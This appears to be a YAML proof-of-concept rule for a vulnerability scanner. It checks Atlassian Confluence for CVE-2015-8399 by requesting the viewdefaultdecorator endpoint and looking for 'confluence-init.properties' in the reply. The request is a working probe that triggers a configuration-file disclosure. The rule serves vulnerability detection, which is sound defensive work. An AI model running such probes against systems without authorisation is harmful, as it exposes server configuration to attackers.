name: poc-yaml-confluence-cve-2015-8399 rules: - method: GET path: /spaces/viewdefaultdecorator.action?decoratorName follow_redirects: false expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator") detail: author: whynot(https://github.com/notwhy) links: - https://www.anquanke.com/vul/id/1150798